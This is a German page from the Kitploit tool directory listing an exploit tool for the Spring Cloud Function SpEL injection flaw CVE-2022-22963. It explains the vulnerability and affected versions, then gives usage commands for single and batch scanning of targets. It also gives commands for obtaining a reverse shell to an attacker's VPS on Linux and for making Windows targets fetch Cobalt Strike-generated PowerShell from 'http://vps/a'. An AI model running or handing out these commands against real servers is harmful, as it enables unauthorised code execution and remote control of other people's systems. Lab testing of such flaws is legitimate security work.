Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
spring-cloud-function-rce — Spring Cloud Function SPEL-Ausdrucksinjektions-Schwachstelle (CVE-2022-22963) | Kitploit
Tools/GitHubGitHub/k3rwin/spring-cloud-function-rce
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubk3rwin/spring-cloud-function-rce

spring-cloud-function-rce

Spring Cloud Function SPEL-Ausdrucksinjektions-Schwachstelle (CVE-2022-22963)

Repository anzeigen
83vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Spring Cloud Function SPEL-Injektionssicherheitslücke (CVE-2022-22963)

Das Spring-Framework bietet ein umfassendes Programmier- und Konfigurationsmodell für moderne Java-basierte Unternehmensanwendungen (auf jeder Art von Bereitstellungsplattform).

Die apply-Methode der Klasse RoutingFunction im serverlosen Framework Spring Cloud Function von Spring Cloud verarbeitet den Parameter spring.cloud.function.routing-expression im Anforderungsheader als SpEL-Ausdruck, was zu einer SpEL-Injektion führt. Angreifer können diese Sicherheitslücke ausnutzen, um beliebigen Code auszuführen.

Betroffene Versionen: 3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

Das Skript dient nur zu Lernzwecken. Bei anderweitiger Nutzung übernimmt der Autor keinerlei rechtliche Verantwortung.

1. Installation (Modulinstallation)

root@kitploit:~
pip3 install -r requirements.txt	

2. Verwendung

python3 spring-cloud-function-rce.py -h

image-20220414184058525

-u Gibt eine einzelne URL für den DNSlog-Test an

-e Gibt den Reverse-Shell-Modus an

-s Gibt das Betriebssystem des Zielhosts an, standardmäßig Linux, Parameter sind win/linux wird in Verbindung mit -i und -c verwendet

3. Beispiele

3.1 Einzelne URL testen

python3 spring-cloud-function-rce.py -u "http://192.168.50.222:8080/"

image-20220414184202055

3.2 Batch-URL-Test

python3 spring-cloud-function-rce.py -f "urls.txt"

image-20220414184424640

  • 123.58.236.76:47874 ist die vulfocus-Docker-Umgebung, in der nslookup nicht installiert ist, daher schlägt der DNSlog-Test fehl.
  • Die Batch-URLs müssen das Stammverzeichnis der Website sein. http://192.168.50.222:8080/ ist das Stammverzeichnis des lokal aufgebauten Ziels. Das Hinzufügen eines test-Verzeichnisses führt zu einem Fehler des POCs.

3.3 Linux-Ziel: Getshell

python3 spring-cloud-function-rce.py -u "http://192.168.50.222:8080/" -e -i "IP-Adresse des VPS:5566"

image-20220414185231029

3.4 Windows-Ziel: Getshell

python3 spring-cloud-function-rce.py -u "http://192.168.50.222:8080/" -e -s "win" -c "http://vps/a"

-c gibt die Adresse des von CS generierten PowerShell-Codes an, muss mit -s "win" verwendet werden. Die Option -c erfordert die Ausführung des Skripts unter Windows. Das Skript ruft PowerShell zur POC-Kodierung auf.

image-20220414185711222

image-20220414190020294

4. Zielumgebungen

4.1 Eigenständiger Aufbau mit IntelliJ IDEA

Referenzadresse

4.2 Docker-Zielumgebung

vulfocus

image-20220414190509578

Tool herunterladen